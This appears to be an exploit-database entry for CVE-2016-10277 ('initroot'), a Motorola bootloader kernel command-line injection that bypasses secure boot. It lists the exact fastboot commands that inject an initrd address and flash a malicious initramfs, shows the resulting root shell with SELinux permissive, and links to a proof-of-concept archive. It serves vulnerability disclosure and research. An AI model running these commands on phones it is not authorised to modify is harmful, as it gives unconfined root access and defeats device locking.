31 lines
No EOL
1.6 KiB
Text
31 lines
No EOL
1.6 KiB
Text
Sources:
|
|
https://alephsecurity.com/2017/08/30/untethered-initroot/
|
|
https://github.com/alephsecurity/initroot
|
|
|
|
initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)
|
|
|
|
By Roee Hay / Aleph Research, HCL Technologies
|
|
|
|
Recap of the Vulnerability and the Tethered-jailbreak
|
|
|
|
1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
|
|
2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
|
|
3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
|
|
4. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
|
|
5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
|
|
For example, here is a successful run of the exploit on cedric (Moto G5)
|
|
|
|
$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"
|
|
$ fastboot flash aleph initroot-cedric.cpio.gz
|
|
$ fastboot continue
|
|
|
|
$ adb shell
|
|
cedric:/ # id
|
|
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
|
|
cedric:/ # getenforce
|
|
Permissive
|
|
cedric:/ #
|
|
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42601.zip |